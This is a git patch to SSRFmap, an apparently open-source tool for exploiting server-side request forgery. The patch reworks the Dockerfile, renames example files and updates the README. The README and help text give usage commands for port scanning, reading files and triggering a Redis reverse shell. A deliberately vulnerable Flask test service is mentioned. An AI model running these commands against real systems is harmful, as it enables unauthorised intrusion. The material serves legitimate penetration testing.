From 7a04c5bb6014424d746cd2d84abf98f714f8476d Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 8 Jun 2024 20:48:06 +0200
Subject: [PATCH] Dockerfile reworked + examples

---
 .gitignore                      |  3 ++
 Dockerfile                      | 17 ++++---
 README.md                       | 79 ++++++++++++++++++++-------------
 {data => examples}/example.py   |  7 ++-
 {data => examples}/request.txt  |  0
 {data => examples}/request2.txt |  0
 {data => examples}/request3.txt |  0
 {data => examples}/request4.txt |  0
 {data => examples}/request5.txt |  0
 requirements.txt                |  4 +-
 ssrfmap.py                      | 10 ++---
 11 files changed, 72 insertions(+), 48 deletions(-)
 rename {data => examples}/example.py (89%)
 rename {data => examples}/request.txt (100%)
 rename {data => examples}/request2.txt (100%)
 rename {data => examples}/request3.txt (100%)
 rename {data => examples}/request4.txt (100%)
 rename {data => examples}/request5.txt (100%)

diff --git a/.gitignore b/.gitignore
index c2bd74f..cd42f13 100644
--- a/.gitignore
+++ b/.gitignore
@@ -104,3 +104,6 @@ venv.bak/
 
 # mypy
 .mypy_cache/
+
+# artifacts
+127.0.0.1_5000/
diff --git a/Dockerfile b/Dockerfile
index 9803164..e8e4908 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,9 +1,14 @@
-FROM python:3-alpine3.10
+FROM python:3.12.4-alpine
 
-WORKDIR /opt
+WORKDIR /usr/src/app
+COPY . /usr/src/app
 
-RUN apk update && apk add git
-RUN git clone https://github.com/swisskyrepo/SSRFmap.git
-RUN cd /opt/SSRFmap && pip install -r requirements.txt
+RUN apk update && apk add curl
 
-ENTRYPOINT ["python3","/opt/SSRFmap/ssrfmap.py"]
+# Install requirements
+RUN pip install -r requirements.txt
+
+# Downgrade privileges
+USER 1000
+
+ENTRYPOINT ["python3"]
\ No newline at end of file
diff --git a/README.md b/README.md
index 8196796..7f86b00 100644
--- a/README.md
+++ b/README.md
@@ -45,37 +45,45 @@ The following modules are already implemented and can be used with the `-m` argu
 
 ## Install and Manual
 
-Basic install from the Github repository.
+* From the Github repository.
+  ```powershell
+  $ git clone https://github.com/swisskyrepo/SSRFmap
+  $ cd SSRFmap/
+  $ pip3 install -r requirements.txt
+  $ python3 ssrfmap.py
 
-```powershell
-$ git clone https://github.com/swisskyrepo/SSRFmap
-$ cd SSRFmap/
-$ pip3 install -r requirements.txt
-$ python3 ssrfmap.py
+    usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
+                      [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
+                      [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
 
-  usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
-                    [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
-                    [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
+    optional arguments:
+      -h, --help          show this help message and exit
+      -r REQFILE          SSRF Request file
+      -p PARAM            SSRF Parameter to target
+      -m MODULES          SSRF Modules to enable
+      -l HANDLER          Start an handler for a reverse shell
+      -v [VERBOSE]        Enable verbosity
+      --lhost LHOST       LHOST reverse shell
+      --lport LPORT       LPORT reverse shell
+      --uagent USERAGENT  User Agent to use
+      --ssl [SSL]         Use HTTPS without verification
+      --proxy PROXY       Use HTTP(s) proxy (ex: http://localhost:8080)
+      --level [LEVEL]     Level of test to perform (1-5, default: 1)
+  ```
+
+* Docker
+  ```powershell
+  $ git clone https://github.com/swisskyrepo/SSRFmap
+  $ docker build --no-cache -t ssrfmap .
+  $ docker run -it ssrfmap ssrfmap.py [OPTIONS] 
+  $ docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py
+  ```
 
-  optional arguments:
-    -h, --help          show this help message and exit
-    -r REQFILE          SSRF Request file
-    -p PARAM            SSRF Parameter to target
-    -m MODULES          SSRF Modules to enable
-    -l HANDLER          Start an handler for a reverse shell
-    -v [VERBOSE]        Enable verbosity
-    --lhost LHOST       LHOST reverse shell
-    --lport LPORT       LPORT reverse shell
-    --uagent USERAGENT  User Agent to use
-    --ssl [SSL]         Use HTTPS without verification
-    --proxy PROXY       Use HTTP(s) proxy (ex: http://localhost:8080)
-    --level [LEVEL]     Level of test to perform (1-5, default: 1)
-```
 
 ## Examples
 
 First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap. 
-They should look like the following. More examples are available in the **/data** folder.
+They should look like the following. More examples are available in the **./examples** folder.
 
 ```powershell
 POST /ssrf HTTP/1.1
@@ -97,21 +105,21 @@ Use the `-m` followed by module name (separated by a `,` if you want to launch s
 
 ```powershell
 # Launch a portscan on localhost and read default files
-python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
+python ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan
 ```
 
 If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`.
 
 ```powershell
 # Launch a portscan against an HTTPS endpoint using a custom user-agent
-python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
+python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
 ```
 
 Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.
 
 ```powershell
 # Triggering a reverse shell on a Redis
-python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
+python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
 
 # -l create a listener for reverse shell on the specified port
 # --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
@@ -127,10 +135,19 @@ When the target is protected by a WAF or some filters you can try a wide range o
 
 A quick way to test the framework can be done with `data/example.py` SSRF service.
 
-```powershell
-FLASK_APP=data/example.py flask run &
-python ssrfmap.py -r data/request.txt -p url -m readfiles
-```
+* Local
+  ```powershell
+  FLASK_APP=examples/example.py flask run &
+  python ssrfmap.py -r examples/request.txt -p url -m readfiles
+  ```
+
+* Docker
+  ```ps1
+  docker build --no-cache -t ssrfmap .
+  docker run -it -v $(pwd):/usr/src/app --name example ssrfmap examples/example.py
+  docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles
+  ```
+
 
 ## Contribute
 
diff --git a/data/example.py b/examples/example.py
similarity index 89%
rename from data/example.py
rename to examples/example.py
index ddacbba..b255b98 100644
--- a/data/example.py
+++ b/examples/example.py
@@ -1,9 +1,8 @@
-# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE)
-# NOTE: this file should become a simple ssrf example in order to test SSRFmap
+# NOTE: Do not try this at home - highly vulnerable ! (SSRF and RCE)
+# NOTE: SSRF examples script
 # FLASK_APP=example.py flask run
 
-from flask import Flask, abort, request 
-import json
+from flask import Flask, request 
 import re
 import subprocess
 
diff --git a/data/request.txt b/examples/request.txt
similarity index 100%
rename from data/request.txt
rename to examples/request.txt
diff --git a/data/request2.txt b/examples/request2.txt
similarity index 100%
rename from data/request2.txt
rename to examples/request2.txt
diff --git a/data/request3.txt b/examples/request3.txt
similarity index 100%
rename from data/request3.txt
rename to examples/request3.txt
diff --git a/data/request4.txt b/examples/request4.txt
similarity index 100%
rename from data/request4.txt
rename to examples/request4.txt
diff --git a/data/request5.txt b/examples/request5.txt
similarity index 100%
rename from data/request5.txt
rename to examples/request5.txt
diff --git a/requirements.txt b/requirements.txt
index 75e0c0d..f753748 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,2 +1,2 @@
-Flask==2.3.2
-requests==2.21.0
+Flask==3.0.3
+requests==2.31.0
diff --git a/ssrfmap.py b/ssrfmap.py
index 852acf4..e33ba34 100644
--- a/ssrfmap.py
+++ b/ssrfmap.py
@@ -17,11 +17,11 @@ def display_banner():
 
 def parse_args():
     example_text = '''Examples:
-    python ssrfmap.py -r data/request2.txt -p url -m portscan
-    python ssrfmap.py -r data/request.txt -p url -m redis
-    python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
-    python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
-    python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles 
+    python ssrfmap.py -r examples/request2.txt -p url -m portscan
+    python ssrfmap.py -r examples/request.txt -p url -m redis
+    python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
+    python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
+    python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles 
     '''
     parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
     parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")